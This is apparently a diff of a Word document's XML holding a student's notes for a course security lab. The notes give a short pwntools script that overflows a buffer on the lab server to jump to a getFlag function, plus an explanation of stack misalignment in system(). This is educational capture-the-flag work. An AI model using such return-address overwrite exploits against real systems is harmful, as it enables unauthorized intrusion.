-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
         </w:rPr>
         <w:t> </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This is because the stack becomes disaligned after pushing the value in </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>rbp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> registry onto stack (stack alignment becomes off by 8), and thus the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>system()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> function crashes.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>We have to avoid this jumping past the address in which the instruction occurs:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
         </w:rPr>
         <w:t> </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="1E4E79"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="1E4E79"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Task 01</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>#!/usr/bin/python3</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>from pwn import *</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>io = remote('INF226.puffling.no', 7001)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t># 00000000004011d6 &lt;getFlag&gt; from objdump -d ./01</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>line = b'A' * 16 + b'\xd6\x11\x40\x00\x00\x00\x00\x00'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>io.sendline(line)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>print(io.recvall())</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>NTS: The ‘line’ variable does not have to be that specific address… idk why. Also works with others. Figure out why somehow.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="2E75B5"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="2E75B5"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="2E75B5"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Output</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
           <w:noProof/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54F9F7B5" wp14:editId="35D1C0E3">
-            <wp:extent cx="5132070" cy="1009650"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="946021900" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="420F3286" wp14:editId="166CD076">
+            <wp:extent cx="5343525" cy="1781175"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="227121358" name="Picture 1" descr="A screen shot of a computer screen&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1643,13 +5472,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="946021900" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPr id="227121358" name="Picture 1" descr="A screen shot of a computer screen&#10;&#10;Description automatically generated"/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11">
+                    <a:blip r:embed="rId14">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -1664,7 +5493,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5132070" cy="1009650"/>
+                      <a:ext cx="5343525" cy="1781175"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1683,191 +5512,218 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The address of the instruction </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">after </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>push %rbp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>40121b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (i.e. address of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>getFlag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + 5). By returning here instead of the top of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>getFlag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>, we avoid the problem of stack disalignment.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift Light" w:hAnsi="Bahnschrift Light"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift Light" w:hAnsi="Bahnschrift Light"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Source: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId15" w:anchor="solving-the-system-crash" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Bahnschrift Light" w:hAnsi="Bahnschrift Light"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+          </w:rPr>
+          <w:t xml:space="preserve">ROP: </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Bahnschrift Light" w:hAnsi="Bahnschrift Light"/>
+            <w:i/>
+            <w:iCs/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+          </w:rPr>
+          <w:t xml:space="preserve">Solving the </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Bahnschrift Light" w:hAnsi="Bahnschrift Light"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+          </w:rPr>
+          <w:t>system()</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Bahnschrift Light" w:hAnsi="Bahnschrift Light"/>
+            <w:i/>
+            <w:iCs/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> crash</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift Light" w:hAnsi="Bahnschrift Light"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>, 11:54 9/15/2023.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
           <w:kern w:val="0"/>
-          <w:lang w:val="nb-NO"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
